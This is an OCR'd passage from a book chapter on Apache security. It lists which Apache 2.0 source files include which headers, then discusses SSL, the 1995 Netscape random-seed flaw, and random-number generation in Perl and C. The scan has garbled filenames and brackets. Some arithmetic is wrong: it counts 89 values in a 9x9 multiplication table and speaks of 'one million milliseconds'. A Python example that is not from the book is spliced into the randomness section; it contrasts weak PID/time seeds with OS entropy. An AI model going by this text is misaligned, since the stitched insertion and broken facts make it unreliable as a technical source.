ssl_util_table.c        High performance hash table functions 
util.c                  DAV utilities extension module for Apache 2.0.x 
util_lock.c             DAV repository-independent lock functions 
Win9xConHook.c          Win9xConHook.dll (a hook proc to clean up Win95/98 console behavior) 





Include File Cross-Reference 


The following section shows include file associations to major C source files. 
ap_config.h 
Include [buildmark.c, 55] buildmark.c 
Include [config.c, 85] config.c 
Include [connection.c, 63] connection.c 
Include [core.c, 72] core.c 
Include [gen_test_char.c, 67] gen_test_char.c 
Include [listen.c, 67] listen.c 
Include [log.c, 87] log.c 
Include [main.c, 69] main.c 
Include [mpmt_os2.c, 86] mpmt_os2.c 
Include [mpmt_os2_child.c, 64] mpmt_os2_child.c 
Include [mpm_netware.c, 104] mpm_netware.c 
Include [perchild.c, 82] perchild.c 
Include [prefork.c, 78] prefork.c 
Include [spmt_os2.c, 63] spmt_os2.c 
Include [threaded.c, 87] threaded.c 
Include [mpm_winnt.c, 71] mpm_winnt.c 
Include [worker.c, 96] worker.c 
Include [protocol.c, 79] protocol.c 
Include [request.c, 77] request.c 
Include [rfc1413.c, 92] rfc1413.c 
Include [scoreboard.c, 71] scoreboard.c 
Include [util.c, 89] util.c 
Include [util_charset.c, 59] util_charset.c 
Include [util_ebcdic.c, 59] util_ebcdic.c 
Include [util_md5.c, 88] util_md5.c 
Include [util_script.c, 71] util_script.c 
Include [vhost.c, 72] vhost.c 

ap_listen.h 
Include [listen.c, 70] listen.c 
Include [beos.c, 79] beos.c 
Include [mpmt_os2.c, 96] mpmt_os2.c 
Include [mpmt_os2_child.c, 74] mpmt_os2_child.c 
Include [mpm_netware.c, 115] mpm_netware.c 
Include [perchild.c, 93] perchild.c 
Include [prefork.c, 90] prefork.c 
Include [spmt_os2.c, 73] spmt_os2.c 
Include [threaded.c, 97] threaded.c 
Include [mpm_winnt.h, 62] mpm_winnt.h 
Include [mpm_winnt.c, 72] mpm_winnt.c 
Include [worker.c, 106] worker.c 
Include [mpm_common.c, 83] mpm_common.c 

ap_mmn.h 
Include [mpm_netware.c, 116] mpm_netware.c 
Include [prefork.c, 91] prefork.c 

ap_mpm.h 
Include [connection.c, 68] connection.c 
Include [main.c, 77] main.c 
Include [beos.c, 77] beos.c 
Include [mpmt_os2.c, 95] mpmt_os2.c 
Include [mpmt_os2_child.c, 73] mpmt_os2_child.c 
Include [mpm_netware.c, 113] mpm_netware.c 
Include [perchild.c, 90] perchild.c 
Include [prefork.c, 87] prefork.c 
Include [spmt_os2.c, 72] spmt_os2.c 
Include [threaded.c, 94] threaded.c 
Include [mpm_winnt.c, 70] mpm_winnt.c 
Include [worker.c, 103] worker.c 
Include [mpm_common.c, 82] mpm_common.c 
Include [scoreboard.c, 77] scoreboard.c 

apr.h 
Include [config.c, 74] config.c 
Include [connection.c, 59] connection.c 
Include [core.c, 59] core.c 
Include [gen_test_char.c, 59] gen_test_char.c 
Include [log.c, 66] log.c 
Include [main.c, 59] main.c 
Include [mpm_netware.c, 82] mpm_netware.c 
Include [prefork.c, 59] prefork.c 
Include [threaded.c, 59] threaded.c 
Include [worker.c, 66] worker.c 
Include [mpm_common.c, 70] mpm_common.c 
Include [protocol.c, 66] protocol.c 
Include [rfc1413.c, 82] rfc1413.c 
Include [scoreboard.c, 59] scoreboard.c 
Include [util.c, 72] util.c 
Include [util_script.c, 59] util_script.c 
Include [vhost.c, 64] vhost.c 

apr_base64.h 
Include [util.c, 90] util.c 

apr_buckets.h 
Include [core.c, 84] core.c 
Include [error_bucket.c, 56] error_bucket.c 
Include [protocol.c, 68] protocol.c 

apr_date.h 
Include [util_script.c, 80] util_script.c 
apr_errno.h 
Include [log.c, 69] log.c 
Include [fdqueue.h, 70] fdqueue.h 

apr_file_io.h 
Include [config.c, 77] config.c 
Include [perchild.c, 63] perchild.c 
Include [threaded.c, 62] threaded.c 
Include [worker.c, 69] worker.c 
Include [request.c, 70] request.c 

apr_fnmatch.h 
Include [core.c, 62] core.c 
Include [request.c, 71] request.c 

apr_general.h 
Include [log.c, 67] log.c 
Include [main.c, 62] main.c 

apr_getopt.h 
Include [main.c, 61] main.c 
Include [mpm_netware.c, 88] mpm_netware.c 
Include [mpm_winnt.c, 67] mpm_winnt.c 

apr_hash.h 
Include [core.c, 63] core.c 
Include [perchild.c, 59] perchild.c 
Include [util_filter.c, 58] util_filter.c 

apr_hooks.h 
Include [util_filter.c, 74] util_filter.c 

apr_inherit.h 
Include [rfc1413.c, 86] rfc1413.c 

apr_lib.h 
Include [core.c, 61] core.c 
Include [gen_test_char.c, 60] gen_test_char.c 
Include [log.c, 71] log.c 
Include [main.c, 63] main.c 
Include [mpm_winnt.c, 69] mpm_winnt.c 
Include [service.c, 71] service.c 
Include [protocol.c, 69] protocol.c 
Include [rfc1413.c, 85] rfc1413.c 
Include [scoreboard.c, 62] scoreboard.c 
Include [util.c, 74] util.c 
Include [util_filter.c, 57] util_filter.c 
Include [util_script.c, 60] util_script.c 
Include [vhost.c, 66] vhost.c 

apr_lock.h 
Include [listen.c, 61] listen.c 
Include [mpm_common.c, 74] mpm_common.c 

apr_network_io.h 
Include [listen.c, 59] listen.c 
Include [rfc1413.c, 83] rfc1413.c 
apr_pools.h 
Include [perchild.c, 61] perchild.c 

apr_portable.h 
Include [config.c, 76] config.c 
Include [beos.c, 70] beos.c 
Include [mpmt_os2.c, 97] mpmt_os2.c 
Include [mpmt_os2_child.c, 75] mpmt_os2_child.c 
Include [mpm_netware.c, 83] mpm_netware.c 
Include [perchild.c, 62] perchild.c 
Include [prefork.c, 60] prefork.c 
Include [spmt_os2.c, 74] spmt_os2.c 
Include [threaded.c, 60] threaded.c 
Include [mpm_winnt.c, 66] mpm_winnt.c 
Include [worker.c, 67] worker.c 
Include [scoreboard.c, 61] scoreboard.c 
Include [util_md5.c, 89] util_md5.c 

apr_proc_mutex.h 
Include [worker.c, 73] worker.c 

apr_signal.h 
Include [log.c, 72] log.c 
Include [mpm_netware.c, 86] mpm_netware.c 
Include [perchild.c, 64] perchild.c 
Include [prefork.c, 63] prefork.c 
Include [threaded.c, 64] threaded.c 
Include [worker.c, 71] worker.c 
Include [mpm_common.c, 72] mpm_common.c 
Include [protocol.c, 70] protocol.c 
apr_strings.h 
Include [config.c, 75] config.c 
Include [connection.c, 60] connection.c 
Include [core.c, 60] core.c 
Include [error_bucket.c, 57] error_bucket.c 
Include [listen.c, 60] listen.c 
Include [log.c, 68] log.c 
Include [main.c, 60] main.c 
Include [beos.c, 69] beos.c 
Include [mpmt_os2.c, 99] mpmt_os2.c 
Include [mpmt_os2_child.c, 77] mpmt_os2_child.c 
Include [mpm_netware.c, 84] mpm_netware.c 
Include [perchild.c, 60] perchild.c 
Include [prefork.c, 61] prefork.c 
Include [spmt_os2.c, 76] spmt_os2.c 
Include [threaded.c, 61] threaded.c 
Include [mpm_winnt.c, 68] mpm_winnt.c 
Include [registry.c, 79] registry.c 
Include [service.c, 70] service.c 
Include [worker.c, 68] worker.c 
Include [mpm_common.c, 73] mpm_common.c 
Include [protocol.c, 67] protocol.c 
Include [request.c, 69] request.c 
Include [rfc1413.c, 84] rfc1413.c 
Include [scoreboard.c, 60] scoreboard.c 
Include [util.c, 73] util.c 
Include [util_filter.c, 59] util_filter.c 
Include [util_md5.c, 90] util_md5.c 
Include [util_script.c, 61] util_script.c 
Include [vhost.c, 65] vhost.c 
apr_tables.h 
Include [mpm_netware.c, 87] mpm_netware.c 

apr_thread_cond.h 
Include [fdqueue.h, 67] fdqueue.h 

apr_thread_mutex.h 
Include [mpm_netware.c, 89] mpm_netware.c 
Include [fdqueue.h, 66] fdqueue.h 
Include [worker.c, 72] worker.c 

apr_thread_proc.h 
Include [core.c, 64] core.c 
Include [log.c, 70] log.c 
Include [mpm_netware.c, 85] mpm_netware.c 
Include [prefork.c, 62] prefork.c 
Include [threaded.c, 63] threaded.c 
Include [worker.c, 70] worker.c 
Include [mpm_common.c, 71] mpm_common.c 

apr_uri.h 
Include [main.c, 75] main.c 

apr_want.h 
Include [config.c, 81] config.c 
Include [core.c, 69] core.c 
Include [listen.c, 64] listen.c 
Include [log.c, 76] log.c 
Include [main.c, 66] main.c 
Include [mpm_netware.c, 93] mpm_netware.c 
Include [perchild.c, 67] perchild.c 
Include [prefork.c, 67] prefork.c 
Include [threaded.c, 66] threaded.c 
Include [worker.c, 75] worker.c 
Include [protocol.c, 75] protocol.c 
Include [request.c, 74] request.c 
Include [rfc1413.c, 90] rfc1413.c 
Include [scoreboard.c, 65] scoreboard.c 
Include [util.c, 78] util.c 
Include [util_debug.c, 60] util_debug.c 
Include [util_filter.c, 56] util_filter.c 
Include [util_script.c, 64] util_script.c 
Include [vhost.c, 69] vhost.c 

apr_xml.h 
Include [util_xml.c, 55] util_xml.c 

beosd.h 
Include [beos.c, 78] beos.c 

fdqueue.h 
Include [fdqueue.c, 59] fdqueue.c 
Include [worker.c, 108] worker.c 

grp.h 
Include [perchild.c, 101] perchild.c 

http_config.h 
Include [config.c, 87] config.c 
Include [connection.c, 70] connection.c 
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Include [core.c, 74] core.c 
Include [listen.c, 69] listen.c 
Include [log.c, 89] log.c 
Include [main.c, 73] main.c 
Include [beos.c, 74] beos.c 
Include [mpmt_os2.c, 91] mpmt_os2.c 


Include [mpmt_os2_child.c, 69] mpmt_os2_child.c 


Include [mpm_netware.c, 109] mpm_netware.c 








Include [perchild.c, 86] perchild.c 
Include [prefork.c, 83] prefork.c 
Include [spmt_os2.c, 68] spmt_os2.c 
Include [threaded.c, 91] threaded.c 
Include [mpm_winnt.c, 63] mpm_winnt.c 
Include [worker.c, 100] worker.c 
Include [mpm_common.c, 77] mpm_common.c 
Include [protocol.c, 81] protocol.c 
Include [request.c, 79] request.c 
Include [scoreboard.c, 76] scoreboard.c 
Include [util.c, 95] util.c 
Include [util_debug.c, 63] util_debug.c 
Include [util _seript.c, 73] util_script.c 
Include [vhost.c, 74] vhost.c 


http_connection.h 


Include [connection.c, 65] connection.c 
Include [core.c, 83] core.c 
Include [beos.c, 76] beos.c 
Include [mpmt_os2.c, 93] mpmt_os2.c 


Include [mpmt_os2_child.c, 71] mpmt_os2_child.c 
Include [mpm_netware.c, 111] mpm_netware.c 


Include [perchild.c, 89] perchild.c 
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Include [prefork.c, 85] prefork.c 
Include [spmt_os2.c, 70] spmt_os2.c 
Include [threaded.c, 93] threaded.c 
Include [mpm_winnt.c, 65] mpm_winnt.c 
Include [worker.c, 102] worker.c 
http_core.h 

Include [config.c, 89] config.c 
Include [core.c, 75] core.c 
Include [log.c, 90] log.c 
Include [beos.c, 75] beos.c 
Include [mpmt_os2.c, 92] mpmt_os2.c 


Include [mpmt_os2_child.c, 70] mpmt_os2_child.c 


Include [mpm_netware.c, 110] mpm_netware.c 


Include [perchild.c, 87] perchild.c 
Include [prefork.c, 84] prefork.c 
Include [spmt_os2.c, 69] spmt_os2.c 
Include [threaded.c, 92] threaded.c 
Include [mpm_winnt.c, 64] mpm_winnt.c 
Include [worker.c, 101] worker.c 
Include [protocol.c, 82] protocol.c 
Include [request.c, 81] request.c 
Include [scoreboard.c, 75] scoreboard.c 
Include [util_script.c, 76] util_script.c 
Include [util_xml.c, 60] util_xml.c 
Include [vhost.c, 78] vhost.c 
http_log.h 
Include [config.c, 90] config.c 
Include [connection.c, 73] connection.c 


Include [core.c, 80] core.c 
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Include [listen.c, 71] listen.c 
Include [log.c, 91] log.c 
Include [main.c, 72] main.c 
Include [beos.c, 73] beos.c 
Include [mpmt_os2.c, 90] mpmt_os2.c 


Include [mpmt_os2_child.c, 68] mpmt_os2_child.c 


Include [mpm_netware.c, 108] mpm_netware.c 











Include [perchild.c, 85 perchild.c 
Include [prefork.c, 82] prefork.c 
Include [spmt_os2.c, 67 spmt_os2.c 
Include [threaded.c, 90 threaded.c 
Include [mpm_winnt.c, 62] mpm_winnt.c 
Include [registry.c, 77 registry.c 
Include [service.c, 68] service.c 
Include [worker.c, 99] worker.c 
Include [mpm_common.c, 78] mpm_common.c 
Include [protocol.c, 87] protocol.c 
Include [request.c, 83] request.c 
Include [rfc1413.c, 94] rfc1413.c 
Include [scoreboard.c, 73] scoreboard. c 
Include [util.c, 93] util.c 
Include [util filter.c, 62] util _filter.c 
Include [util_seript.c, 75] util_script.c 
Include [util_xml.c, 59] util_xml.c 
Include [vhost.c, 75] vhost.c 
http_main.h 
Include [config.c, 92] config.c 
Include [core.c, 79] core.c 
Include [log.c, 92] log.c 


Include [main.c, 71] main.c 
Include [beos.c, 72] beos.c 
Include [mpmt_os2.c, 89] mpmt_os2.c 
Include [mpmt_os2_child.c, 67] mpmt_os2_child.c 
Include [mpm_netware.c, 107] mpm_netware.c 
Include [perchild.c, 84] perchild.c 
Include [prefork.c, 81] prefork.c 
Include [spmt_os2.c, 66] spmt_os2.c 
Include [threaded.c, 89] threaded.c 
Include [mpm_winnt.c, 61] mpm_winnt.c 
Include [worker.c, 98] worker.c 
Include [mpm_common.c, 79] mpm_common.c 
Include [protocol.c, 84] protocol.c 
Include [request.c, 84] request.c 
Include [rfc1413.c, 96] rfc1413.c 
Include [scoreboard.c, 74] scoreboard.c 
Include [util.c, 92] util.c 
Include [util_script.c, 74] util_script.c 


http_protocol.h 


Include [config.c, 88] config.c 
Include [connection.c, 67] connection.c 
Include [core.c, 76] core.c 


Include [error_bucket.c, 55] error_bucket.c 


Include [perchild.c, 88] perchild.c 
Include [protocol.c, 83] protocol.c 
Include [request.c, 82] request.c 
Include [util.c, 94] util.c 
Include [util_script.c, 77] util_script.c 
Include [util_xml.c, 58] util_xml.c 


Include [vhost.c, 77] vhost.c 
http_request.h 


Include [config.c, 91] config.c 
Include [connection.c, 66] connection.c 
Include [core.c, 77] core.c 
Include [protocol.c, 85] protocol.c 
Include [request.c, 80] request.c 
Include [util_script.c, 78] util_script.c 


http_vhost.h 


Include [config.c, 93] config.c 
Include [connection.c, 71] connection.c 
Include [core.c, 78] core.c 
Include [main.c, 74] main.c 
Include [protocol.c, 86] protocol.c 
Include [vhost.c, 76] vhost.c 
httpd.h 
Include [buildmark.c, 56] buildmark.c 
Include [config.c, 86] config.c 
Include [connection.c, 64] connection.c 
Include [core.c, 73] core.c 


Include [gen_test_char.c, 68] gen_test_char.c 


Include [listen.c, 68] listen.c 
Include [log.c, 88] log.c 
Include [main.c, 70] main.c 
Include [beos.c, 71] beos.c 
Include [mpm.h, 64] mpm.h 
Include [mpmt_os2.c, 87] mpmt_os2.c 


Include [mpmt_os2_child.c, 65] mpmt_os2_child.c 


Include [mpm_netware.c, 105] mpm_netware.c 





Include [mpm.h, 59] mpm.h 
Include [perchild.c, 83] perchild.c 
Include [prefork.c, 79] prefork.c 
Include [mpm.h, 64] mpm.h 
Include [spmt_os2.c, 64] spmt_os2.c 
Include [threaded.c, 88] threaded.c 
Include [mpm_winnt.c, 60] mpm_winnt.c 
Include [registry.c, 76] registry.c 
Include [service.c, 67] service.c 
Include [fdqueue.h, 61] fdqueue.h 
Include [worker.c, 97] worker.c 
Include [mpm_common.c, 76] mpm_common.c 
Include [protocol.c, 80] protocol.c 
Include [request.c, 78] request.c 
Include [rfc1413.c, 93] rfc1413.c 
Include [scoreboard.c, 72] scoreboard.c 
Include [util.c, 91] util.c 
Include [util_debug.c, 62] util_debug.c 
Include [util_filter.c, 61] util_filter.c 
Include [util_md5.c, 91] util_md5.c 
Include [util_script.c, 72] util_script.c 
Include [util_xml.c, 57] util_xml.c 
Include [vhost.c, 73] vhost.c 
Include [mpm.h, 59] mpm.h 
io.h 
Include [spmt_os2.c, 83] spmt_os2.c 
library.h 
Include [mpm_netware.c, 126] mpm_netware.c 


CHAPTER 14 Apache Under the Hood: Open Source and Security 


limits.h 
Include [threaded.c, 101] threaded.c 
Include [worker.c, 111] worker.c 
malloc.h 
Include [mpm_winnt.c, 76] mpm_winnt.c 
Include [core.c, 87] core.c 
Include [listen.c, 72] listen.c 
Include [beos.c, 83] beos.c 
Include [mpmt_os2_child.c, 76] mpmt_os2_child.c 
Include [mpm_netware.c, 114] mpm_netware.c 
Include [perchild.c, 92] perchild.c 
Include [prefork.c, 89] prefork.c 
Include [spmt_os2.c, 75] spmt_os2.c 
socket.h 
Include [beos.c, 85] beos.c 
Include [fdqueue.h, 69] fdqueue.h 
stat.h 
Include [perchild.c, 103] perchild.c 
stdlib.h 
Include [spmt_os2.c, 79] spmt_os2.c 
Include [fdqueue.h, 62] fdqueue.h 


Include [util_cfgtree.c, 61] util_cfgtree.c 
Surfing Apache’s source tree at length is unnecessary unless you plan to do extensive 
Apache development. However, familiarizing yourself with it—and where its security 
routines reside—is worth a few minutes. From this experience, you'll garner a much 
clearer understanding of its security model. 
Apache/SSL 


• What Is SSL? 
• How Secure Is SSL? 
• mod_ssl 
• Installing Apache-SSL 
• Certificate Authorities 
• Commercial SSL Packages 


Despite early market projections, electronic commerce was no overnight success. 
Initially, this was because of the public’s unfamiliarity with the Internet, but 
it eventually became clear that before online commerce could really take hold, 
Web-based communication had to be secure. Plainly, users were reticent to send 
credit card data over the Internet, with good reason. 


By default, Web-based communication had several weaknesses: 


• HTTP offers no encryption mechanism, and therefore 
third parties can sniff traffic between clients and the 
server. Thus, the user’s session offers little or no 
privacy. 


• HTTP is a stateless protocol—it doesn’t store information 
on users and therefore cannot verify a user’s identity. 


• HTTP provides no means to authenticate an ongoing 
session. Hence, it cannot determine whether a third, 
untrusted party has hijacked the current session. 


To address these shortcomings, Netscape Communications 
developed the Secure Sockets Layer Protocol, or SSL. 


What Is SSL? 


Secure Sockets Layer (SSL) is a three-tiered method that 
employs RSA and DES authentication and encryption, as 
well as additional MD5 integrity checking. Using these 
methods, SSL addresses all three issues inherent in Web- 
based communication: 

• At connection time, the client and server define a secret key, which is used to 
encrypt transiting data. Hence, though SSL traffic can be sniffed, it is encrypted 
and therefore difficult to unravel. 


• SSL supports public key cryptography, so the server can authenticate users 
using popular schemes such as RSA and the Digital Signature Standard (DSS). 


• The server can verify the integrity of ongoing sessions using message digest 
algorithms such as MD5 and SHA. 


These features make SSL an excellent tool for securing electronic commerce 
transactions. 


How Secure Is SSL? 


SSL, like almost any new technology, had a rocky start, beginning in September 
1995, when two Berkeley students—Ian Goldberg and David Wagner—announced 
that they had cracked Netscape’s random number generator scheme. 


This news rocked the electronic commerce community and prompted sensational 
media coverage. Here’s an excerpt from a New York Times article by John Markoff 
that appeared under the headline “Security Flaw Is Discovered in Software Used in 
Shopping”: 


A serious security flaw has been discovered in Netscape, the most popular software used for 
computer transactions over the Internet’s World Wide Web, threatening to cast a chill over the 
emerging market for electronic commerce. The flaw, which could enable a knowledgeable 
criminal to use a computer to break Netscape’s security coding system in less than a minute, 
means that no one using the software can be certain of protecting credit card information, 
bank account numbers, or other types of information that Netscape is supposed to keep 
private during online transactions. 


Though Netscape quickly addressed the issue, the story serves as a reminder that 
even excellent security tools can fail because of flawed implementation. 


Goldberg and Wagner began their analysis in the dark, chiefly because Netscape held 
back source code on certain vital elements of SSL. The students reverse engineered 
the code, and in the process discovered a major flaw in how Netscape generated 
random numbers. 


Random numbers have always been a problem in cryptography, even when functions 
used to derive them are fundamentally sound. This is because it’s difficult to 
generate a random number. 

In this context, random refers to a quality with minimal predictability. In science 
and nature, many systems and cycles that initially appear to be chaotic or random 
do in fact have observable predictability. Often, the key to recognizing that 
predictability (or recognizing a pattern in a seemingly patternless phenomenon) is 
time. 


NOTE 


A simple example could be children playing jump rope with two ropes. Here, you have several 
variables: two ropes, two children, and two arms each. As they twirl and twist the ropes, you 
might think that the number of revolutions per minute and the positional relationship 
between each rope (at any given time) are random (or even chaotic). They’re likely not. Over 
time, if you sample many uninterrupted hours of play (with these same two children and two 
ropes), a discernible pattern might emerge. 





Deriving random numbers is so difficult that scientists have turned to unconventional 
means. For example, some researchers focus their studies on chaos theory, or 
the mathematical study of chaotic structures. 


NOTE 


Perhaps the most interesting (or offbeat) step in this direction is the use of lava lamps to 
generate decent random numbers. To see such a project in action, visit LavaRand at 
http://www.lavarnd.org/. 





Meanwhile, to compensate for the current inability to computationally create “real” 
random numbers without help from outside chaotic systems, programmers rely on a 
complicated parlor trick. Instead of trying to derive a random number from natural 
phenomena, programmers use functions that generate normal numbers and subject 
them to mathematical operations so complicated that the average human cannot 
anticipate the observable predictability within them. The resulting number is, for all 
purposes, “random enough.” Or is it? 


That depends on the steps programmers take to derive this random (or more 
appropriately, pseudo-random) number. Every number has a starting point or seed source, 
and depending on that initial seed source, your so-called pseudo-random number 
might be fundamentally flawed from the start. 


For example, suppose that you derived your seed source from standard multiplication 
tables (1x1 to 9x9). Here, you’d have 89 possible numbers (or multiplication 
values) to choose from. Anyone, even without pen and paper, could quickly identify 
all 89 combinations. 

Your resulting number, therefore, would never be “random enough.” This was at the 
heart of SSL’s first vulnerability. Goldberg and Wagner determined that Netscape was 
using three values to generate the seed source for the initial secret key: 


• A process ID (PID) 
• A parent process ID (PPID) 
• The time (in seconds and microseconds) 


Because local users can easily obtain process IDs on Unix and Linux, Goldberg and 
Wagner needed only to ascertain the time. And, as they explain in their paper 
“Randomness and the Netscape Browser: How Secure Is the World Wide Web,” this 
was not difficult: 


Most popular Ethernet sniffing tools (including tcpdump) record the precise time they see each 
packet. Using the output from such a program, the attacker can guess the time of day on the 


system running the Netscape browser to within a second. 


Read the entire paper at 
http://www.ddj.com/articles/1996/9601/9601h/9601h.htm. 


This effectively gave them the time in seconds. (Milliseconds, as they pointed out, 
were a trivial issue at best because there are only one million milliseconds per unit, 
an infinitesimally small range to search given today’s computing power.) The end 
result was that Goldberg and Wagner could crack Netscape’s early SSL in less than a 
minute in some cases. 


NOTE 


Sometimes, for short sessions, such schemes are suitable, providing you don’t expect more 
from them than their throwaway solution. For example, mod_usertrack, an Apache module 
that provides tracking of user preferences and behavior through cookies, uses finite and easily 
discoverable values. Session IDs that mod_usertrack generates consist of a client’s IP, the 
system time, and the server PID. As such, they aren’t random, anyone can generate them, 
and anyone can use them to impersonate other users. Therefore, in your work, don’t build 
applications that rely on them. They’re great for short periods, but Apache never intended 
them for hardcore authentication. 


Where Do These Random Numbers Originate? 


These random numbers have to originate somewhere, right? Absolutely. Different 
programming languages offer different means of pseudo-random number generation. 
Let’s quickly look at them. 
Perl and Randomness 
The Practical Extraction and Report Language provides two basic tools for generating 
random numbers: 


• srand()—To generate the seed 


• rand()—To generate the random number 


As described in Perl’s documentation, srand() 


Sets the random number seed for the rand() operator. If EXPR is omitted, it uses a semirandom 
value based on the current time and process ID, among other things. In versions of Perl 
prior to 5.004 the default seed was just the current time(). This isn’t a particularly good seed, 
so many old programs supply their own seed value (often time * $$ or time * ($$ + ($$ 
<< 15))), but that isn’t necessary any more. 


You needn’t call srand() yourself, because rand() calls it anyway. However, 
although numbers you generate with rand() are suitable for short or throwaway 
tasks, they probably aren’t suited for serious security. As the documentation explains: 


Note that you need something much more random than the default seed for cryptographic 
purposes. Checksumming the compressed output of one or more rapidly changing operating 
system status programs is the usual method. For example: 


srand(time ^ $$ ^ unpack "%L*", `ps axww | gzip`); 


If you’re particularly concerned with this, see the Math::TrulyRandom module in CPAN. 


The Math::TrulyRandom package by Matt Blaze and Don Mitchell (with a significant 
contribution from Gary Howland) is available at 
http://theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/G/GA/GARY/Math-TrulyRandom-1.0.tar.gz 
and represents an improvement on random number generation in Perl. However, its 
author warns: 


Depending on the particular platform, truerand() output may be biased or correlated. In 
general, you can expect about 16 bits of “pseudo-entropy” out of each 32-bit word returned 
by truerand(), but it may not be uniformly diffused. You should therefore run the output 
through some post-whitening function (like MD5 or DES or whatever) before using it to 
generate key material. (RSAREF’s random package does this for you when you feed 


truerand() bits to the seed input function.) 
Other Perl tools for generating random numbers include the following: 


• Math-LogRand-0.01—This Perl extension from Lee Goddard returns a random 
number with log weighting. It returns a “random” integer produced by the Perl 
rand() function, between input parameters, with weighting to low integers by 
log distribution. It is available at 
http://theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/L/LG/LGODDARD/Math-LogRand-0.01.tar.gz. 


• Math-Rand48-1.00—This package from Nick Ing-Simmons provides Perl bindings 
for the drand48() family of random functions (seed48, drand48, lrand48, 
mrand48, nrand48, jrand48). It is available at 
http://testers.cpan.org/search?request=dist;dist=Math-Rand48. 


• Math-Random-0.64—Created by Geoffrey Rommel, Math::Random is a Perl port 
of the C version of randlib, a suite of routines for generating random deviates. 
The port supports all the distributions from which the Fortran and C versions 
generate deviates. The major functionalities that are excluded are the multiple 
generators/splitting facility and antithetic random number generation. It is 
available for download at 
http://theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/G/GR/GROMMEL/Math-Random-0.64.tar.gz. 


• The Mersenne Twister, or Math-Random-MT-1.00—The Mersenne Twister is a 
pseudo-random number generator developed by Makoto Matsumoto and Takuji 
Nishimura. They described it in their paper at 
http://www.math.keio.ac.jp/~nisimura/random/doc/mt.ps. The package is 
available at 
http://theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/A/AM/AMS/Math-Random-MT-1.00.tar.gz. 


• Math-RandomOrg-0.02—This package from Gregory Williams retrieves random 
numbers and data from random.org, a true random number service on the 
Internet. To learn more about random.org, go to 
http://www.random.org/essay.html. To obtain Math-RandomOrg-0.02, go to 
http://theoryx5.uwinnipeg.ca/scripts/CPAN/authors/id/G/GW/GWILLIAMS/Math-RandomOrg-0.02.tar.gz. 


C and Randomness 
Garden-variety C provides random number generation through rand(), included in 
stdlib.h (emphasis mine): 


The rand() function returns a pseudo-random integer between 0 and RAND_MAX. The srand() 
function sets its argument as the seed for a new sequence of pseudo-random integers to be 
returned by rand(). These sequences are repeatable by calling srand() with the same seed 
value. If no seed value is provided, the rand() function is automatically seeded with a value of 
1. Random-number generation is a complex topic. 


Randomness 

Achieving randomness is more difficult than it first appears. The public paper that 
best discusses this issue from a general view is “Randomness Recommendations for 
Security,” also known as RFC 1750, by Donald Eastlake III, Stephen D. Crocker, and 
Jeffrey I. Schiller. 


Those gentlemen open their paper with the following statements: 


Security systems today are built on increasingly strong cryptographic algorithms that foil 
pattern analysis attempts. However, the security of these systems is dependent on generating 
secret quantities for passwords, cryptographic keys, and similar quantities. The use of 
pseudo-random processes to generate secret quantities can result in pseudo-security. The 
sophisticated attacker of these security systems may find it easier to reproduce the environment that 
produced the secret quantities, searching the resulting small set of possibilities, than to locate 
the quantities in the whole of the number space. Choosing random quantities to foil a 
resourceful and motivated adversary is surprisingly difficult. This paper points out many pitfalls 
in using traditional pseudo-random number generation techniques for choosing such 
quantities. It recommends the use of truly random hardware techniques and shows that the existing 
hardware on many systems can be used for this purpose. It provides suggestions to ameliorate 
the problem when a hardware solution is not available. And it gives examples of how large 
such quantities need to be for some particular applications. 


If you’re truly interested in learning why random number schemes are dicey and 
why good ones are difficult to obtain, see RFC 1750, located at 
ftp://ftp.isi.edu/in-notes/rfc1750.txt. 
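The following is an added example (not code from the book, Netscape or Apache) that models the pitfall this section and the Netscape discussion describe: a secret derived from process IDs and the clock, or a mod_usertrack-style ID built from client IP, time and server PID, can be rebuilt by anyone who can reproduce those inputs, whereas a value drawn from the operating system's entropy source (the approach RFC 1750 recommends) cannot. The mixing functions, the 15-bit PID range and the sample values are constructed assumptions, not the real algorithms.

```python
"""Seed quality: a reproducible environment yields a reproducible 'secret'.

Added example, not code from the book or from Netscape/Apache. It models
the seeding scheme the chapter describes for early Netscape SSL (PID,
PPID, time in seconds and microseconds) and a mod_usertrack-style id
(client IP, time, server PID), and contrasts both with the operating
system's entropy source that RFC 1750 recommends. The mixing functions
and the PID range are constructed assumptions, not the real algorithms.
"""
import hashlib
import math
import random
import secrets

PID_BITS = 15  # assumption: classic Unix PIDs run 0..32767


def weak_seed(pid: int, ppid: int, seconds: int, microseconds: int) -> int:
    """Fold the four observable environment values into one integer seed."""
    material = f"{pid}:{ppid}:{seconds}:{microseconds}".encode()
    return int.from_bytes(hashlib.sha256(material).digest(), "big")


def weak_session_key(pid: int, ppid: int, seconds: int, microseconds: int,
                     nbits: int = 128) -> int:
    """Key from a deterministic PRNG seeded only with observable values."""
    rng = random.Random(weak_seed(pid, ppid, seconds, microseconds))
    return rng.getrandbits(nbits)


def usertrack_style_id(client_ip: str, seconds: int, server_pid: int) -> str:
    """Tracking id of the kind the chapter's NOTE warns about: fine for a
    cookie, useless as an authenticator, because anyone can rebuild it."""
    material = f"{client_ip}.{seconds}.{server_pid}".encode()
    return hashlib.sha256(material).hexdigest()


def strong_session_key(nbits: int = 128) -> int:
    """What to use for key material instead: the OS CSPRNG."""
    return secrets.randbits(nbits)


def observer_search_bits(pid_known: bool, ppid_known: bool,
                         time_window_seconds: float) -> float:
    """Bits an observer still has to guess. Local users can read PIDs, and
    sniffer timestamps pin the second, so usually only the microseconds
    (about 2**20 values per second) remain."""
    bits = 0.0
    if not pid_known:
        bits += PID_BITS
    if not ppid_known:
        bits += PID_BITS
    bits += math.log2(time_window_seconds * 1_000_000)
    return bits


def is_reproducible(derive, *env) -> bool:
    """Audit helper: two independent derivations from the same environment
    inputs agree only when the value is a function of that environment."""
    return derive(*env) == derive(*env)
```

Run against the constructed inputs, the weak key and the tracking ID are reproducible and the OS-sourced key is not; with PIDs known and the second pinned, the remaining search is only about 20 bits.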


mod_ssl 
After reading so much about Apache’s modular design, you’d expect that someone at 
some point would write a module that ties SSL into Apache’s overall feature set. In 
fact, several developers did just that, and of those efforts, the most popular is 
mod_ssl, which today ships with Apache 2.0. 


As per its documentation (http://www.modssl.org/docs/2.8/ssl_faq.html#ToC1): 


The mod_ssl v1 package was initially created in April 1998 by Ralf S. Engelschall via porting 
Ben Laurie’s Apache-SSL 1.17 source patches for Apache 1.2.6 to Apache 1.3b6. Because of 
conflicts with Ben Laurie’s development cycle, it then was reassembled from scratch for 
